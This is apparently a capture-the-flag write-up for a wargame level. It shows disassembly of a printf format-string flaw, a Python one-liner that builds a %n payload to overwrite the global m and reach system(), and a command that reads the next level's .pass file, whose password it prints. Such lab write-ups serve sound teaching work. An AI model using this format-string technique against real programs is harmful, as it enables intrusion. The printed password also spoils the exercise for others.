1) disass v

   0x080484a4 <+0>:	push   %ebp
   0x080484a5 <+1>:	mov    %esp,%ebp
   0x080484a7 <+3>:	sub    $0x218,%esp
   0x080484ad <+9>:	mov    0x8049860,%eax
   0x080484b2 <+14>:	mov    %eax,0x8(%esp)
   0x080484b6 <+18>:	movl   $0x200,0x4(%esp)
   0x080484be <+26>:	lea    -0x208(%ebp),%eax
   0x080484c4 <+32>:	mov    %eax,(%esp)
   0x080484c7 <+35>:	call   0x80483a0 <fgets@plt>
   0x080484cc <+40>:	lea    -0x208(%ebp),%eax
   0x080484d2 <+46>:	mov    %eax,(%esp)
   0x080484d5 <+49>:	call   0x8048390 <printf@plt>
   0x080484da <+54>:	mov    0x804988c,%eax
   0x080484df <+59>:	cmp    $0x40,%eax
   0x080484e2 <+62>:	jne    0x8048518 <v+116>
   0x080484e4 <+64>:	mov    0x8049880,%eax
   0x080484e9 <+69>:	mov    %eax,%edx
   0x080484eb <+71>:	mov    $0x8048600,%eax
   0x080484f0 <+76>:	mov    %edx,0xc(%esp)
   0x080484f4 <+80>:	movl   $0xc,0x8(%esp)
   0x080484fc <+88>:	movl   $0x1,0x4(%esp)
   0x08048504 <+96>:	mov    %eax,(%esp)
   0x08048507 <+99>:	call   0x80483b0 <fwrite@plt>
   0x0804850c <+104>:	movl   $0x804860d,(%esp)
   0x08048513 <+111>:	call   0x80483c0 <system@plt>
   0x08048518 <+116>:	leave  
   0x08048519 <+117>:	ret    
   

Этот исполняемый файл использует fgets, который защищен ограничением на количество считываемых символов.

Изъян этого исполняемого файла заключается в том, что пользователь имеет контроль над форматом функции printf. Опция: %n позволяет записать количество символов, записанных ранее, по адресу, переданному в параметре.

Можно получить адрес m, и положить в него 64(0x080484df <+59>:	cmp    $0x40,%eax)

2) objdump -t ./level3
[blalblablalbla]

8048530 g     F .text	00000061              __libc_csu_init
08049860 g     O .bss	00000004              stdin@@GLIBC_2.0
08049890 g       *ABS*	00000000              _end
080483f0 g     F .text	00000000              _start
080485f8 g     O .rodata	00000004              _fp_hw
0804988c g     O .bss	00000004              m
08049880 g     O .bss	00000004              stdout@@GLIBC_2.0
08049844 g       *ABS*	00000000              __bss_start
0804851a g     F .text	0000000d              main
00000000  w      *UND*	00000000              _Jv_RegisterClasses
08048344 g     F .init	00000000              _init

[bblalblablal]


3) python -c 'print "\x8c\x98\x04\x08" + "%10x" * 3 + "A" * 30 + "%n" ' > /tmp/expl

cat /tmp/expl - | ./level3

4) cat /home/user/level4/.pass
b209ea91ad69ef36f2cf0fcbbc24c739fd10464cf545b20bea8572ebdc3c36fa
